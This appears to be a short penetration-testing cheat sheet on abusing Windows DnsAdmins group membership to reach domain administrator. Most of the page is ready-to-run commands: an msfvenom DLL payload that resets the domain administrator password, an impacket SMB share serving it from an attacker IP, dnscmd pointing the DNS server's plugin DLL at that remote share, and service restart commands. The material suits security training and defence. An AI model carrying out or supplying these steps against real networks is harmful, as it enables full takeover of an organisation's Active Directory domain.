DnsAdmins

Information

This membership can be exploited by performing a DLL injection, i.e. specifying a plugin DLL that can be loaded upon (re)starting the DNS service.

Exploitation

Admin Password

Generate a malicious DLL and transfer it to the target.

Passing any payload this way crashes the DNS server as it never really starts. More information on how to bypass this issue by executing the payload as a thread here.

# generating the payload
sudo msfvenom -p windows/x64/exec cmd='net user administrator Password123! /domain' -f dll > da.dll
# starting an SMB server
$ impacket-smbserver -smb2support share ./

Set the DLL path from the compromised host and restart the DNS service (DnsAdmins cannot restart services by default, but it not uncommon to be given that right).

# setting the Windows Registry remote DLL path
dnscmd.exe [FQDN] /config /serverlevelplugindll \\10.10.14.3\share\da.dll

Restart the DNS service. DnsAdmins members cannot restart services by default using sc, but they can do it with dnscmd.

dnscmd

dnscmd [FQDN] /restart

sc

# stop service
sc.exe stop dns
# start service
sc.exe start dns

For an example of the above process check here.

Resources

Exploitation

From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS AdministrationActive Directory Security

DnsAdmins In-depth

Feature, not bug: DNSAdmin to DC compromise in one lineMedium